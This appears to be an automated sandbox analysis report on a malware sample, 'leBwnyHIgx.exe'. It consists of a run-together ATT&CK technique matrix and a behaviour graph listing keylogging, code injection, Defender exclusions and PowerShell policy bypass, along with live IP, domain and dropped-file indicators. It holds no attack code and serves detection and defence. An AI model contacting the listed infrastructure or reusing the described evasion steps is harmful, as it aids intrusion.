                      Obfuscated Files or Information                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares121
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook223
                      Process Injection                      		1
                      Software Packing                      		NTDS36
                      System Information Discovery                      		Distributed Component Object Model2
                      Clipboard Data                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Query Registry                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials131
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadow11
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron223
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Indicator Removal                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585743 Sample: leBwnyHIgx.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 59 xrpy.oss-ap-southeast-1.aliyuncs.com 2->59 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 7 other signatures 2->71 9 leBwnyHIgx.exe 19 2->9         started        signatures3 process4 dnsIp5 61 154.82.85.107, 15091, 15092, 18852 ROOTNETWORKSUS Seychelles 9->61 63 xrpy.oss-ap-southeast-1.aliyuncs.com 47.79.48.230, 443, 49732 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->63 51 C:\Users\user\Downloads\wpsv.5.6.3.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\leBwnyHIgx.exe, PE32 9->53 dropped 55 C:\Users\...\leBwnyHIgx.exe:Zone.Identifier, ASCII 9->55 dropped 57 C:\Users\user\AppData\...\wpsv.5.6.3[1].exe, PE32 9->57 dropped 75 Adds a directory exclusion to Windows Defender 9->75 14 leBwnyHIgx.exe 3 2 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 cmd.exe 1 9->21         started        file6 signatures7 process8 signatures9 79 Multi AV Scanner detection for dropped file 14->79 81 Contains functionality to inject threads in other processes 14->81 83 Contains functionality to capture and log keystrokes 14->83 85 Contains functionality to inject code into remote processes 14->85 23 cmd.exe 14->23         started        25 cmd.exe 14->25         started        87 Bypasses PowerShell execution policy 17->87 89 Adds a directory exclusion to Windows Defender 17->89 27 powershell.exe 22 17->27         started        30 conhost.exe 17->30         started        32 powershell.exe 1 22 19->32         started        34 conhost.exe 19->34         started        36 powershell.exe 39 21->36         started        38 conhost.exe 21->38         started        process10 signatures11 40 powershell.exe 23->40         started        43 conhost.exe 23->43         started        45 conhost.exe 25->45         started        47 powershell.exe 25->47         started        77 Loading BitLocker PowerShell Module 27->77 49 WmiPrvSE.exe 27->49         started        process12 signatures13 73 Loading BitLocker PowerShell Module 40->73

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.